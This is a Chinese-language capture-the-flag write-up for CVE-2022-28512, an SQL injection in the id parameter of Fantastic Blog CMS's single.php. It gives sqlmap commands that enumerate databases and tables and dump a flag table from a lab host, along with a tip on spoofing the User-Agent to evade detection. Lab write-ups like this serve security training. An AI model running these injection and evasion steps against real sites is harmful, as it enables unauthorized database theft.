春秋云境 CVE-2022-28512

靶场介绍:

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

1.打开题目进入Fantastic Blog首页

 

 2.访问url/single.php?id=1页面

 

 

3.并用burp抓包

 

 

使用cookie参数可以绕过身份验证,添加user-agent参数可以绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断

4.构造sqlmap的注入攻击

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1665631205; __atuvc=1%7C8; __atuvs=63f57784e9dc26ac000

5.爆库

sqlmap -u http://eci-2ze3fvrdzptgbl2fagkt.cloudeci1.ichunqiu.com/single.php?id=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" --cookie " __atuvc=1%7C8; __atuvs=63f57784e9dc26ac000" --batch --dbs

 

 

 

 数据库如下,我们需要的是ctf的信息

 

 

6. 所以接下来爆ctf的表

sqlmap -u http://eci-2ze3fvrdzptgbl2fagkt.cloudeci1.ichunqiu.com/single.php?id=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" --cookie " __atuvc=1%7C8; __atuvs=63f57784e9dc26ac000" --batch -D "ctf" --tables

爆出了我们想要的flag字段

 

 7.猎杀时刻,爆字段

sqlmap -u http://eci-2ze3fvrdzptgbl2fagkt.cloudeci1.ichunqiu.com/single.php?id=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" --cookie " __atuvc=1%7C8; __atuvs=63f57784e9dc26ac000" --batch -D "ctf" -T "flag" --dump  

拿到flag